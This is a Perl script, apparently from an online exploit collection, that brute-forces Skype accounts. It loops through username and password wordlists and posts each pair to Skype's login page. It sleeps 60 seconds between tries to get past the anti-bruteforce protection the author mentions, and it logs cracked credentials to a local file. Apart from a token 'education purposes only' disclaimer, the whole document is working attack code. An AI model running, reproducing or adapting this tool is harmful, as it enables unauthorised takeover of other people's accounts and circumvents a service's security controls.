#!perl #----------------------------------------------------------------------------------------------| #With this program you can bruteforce skype accounts | #Authors: Alexander Rachev (a.k.a matrix_killer) | #Contact: matrix_k _at_ abv.bg | #Version: 2.0 | #Copyright: this program is under a Creative Commons Attribution 2.5 Bulgaria License. | #Greets: Bl0od3r, Acid_BDS, Alpha-fan and all other friends[they know who they are ;)] | # !WARNING! | # THIS PROGRAM IS MADE FOR EDUCATION PURPOSES ONLY ! I'M NOT RESPONSIBLE FOR YOUR ACTIONS !!! | #----------------------------------------------------------------------------------------------| #http://search.cpan.org/~dland/Crypt-SSLeay-0.54/SSLeay.pm IS REQUIRED !!!! #The developers of skype are very fast in patching bugs and now there is a one minute anti-bruteforce protection.The only solution is sleep(60) and that is what I have added #Yes I know it is SLOW use Getopt::Std; use HTTP::Request::Common qw(POST); use LWP::UserAgent; $SIG{'INT'} = \&sig_catch;$SIG{'HUP'}='IGNORE';$SIG{'TERM'}='IGNORE'; $SIG{'CHLD'}='IGNORE';$SIG{'ALRM'}='IGNORE'; $| = 1; sub sig_catch { exit; } getopts('u:p:'); our($opt_u,$opt_p); my $userlist = $opt_u; my $passlist = $opt_p; if ($userlist eq "") { print "\n"; print "***************************************************************************\n"; print "Skype Bruteforcer v2.0 \n"; print "By Alexander Rachev(a.k.a matrix_killer) \n"; print "usage: perl $0 -u -p \n"; print "***************************************************************************\n"; exit (1); } open(USERS, "<$userlist") || die ("Cannot open username file"); open(WORDS, "<$passlist") || die ("Cannot open password file"); @users= ; @words= ; close(USERS); close(WORDS); $i=0; foreach $user (@users) { chomp($user); foreach $pass (@words) { chomp($pass); sleep(60); $ua = LWP::UserAgent->new; printf("\n%5d Trying $user:$pass", ++$i); my $req = POST 'https://secure.skype.com/store/member/dologin.html', [ username => $user, password => $pass, login => 'Sign+me+in' ]; my $res = $ua->request($req); if ($res->as_string =~ /cookiecheck/gi) { open (LOG, ">>bruted_skype_accounts.txt"); $time = time(); $loctime = localtime($time); print LOG "\n"; print LOG "Time: $loctime\n"; print LOG "username: $user\n"; print LOG "passowrd: $pass\n\n"; close(LOG); }}}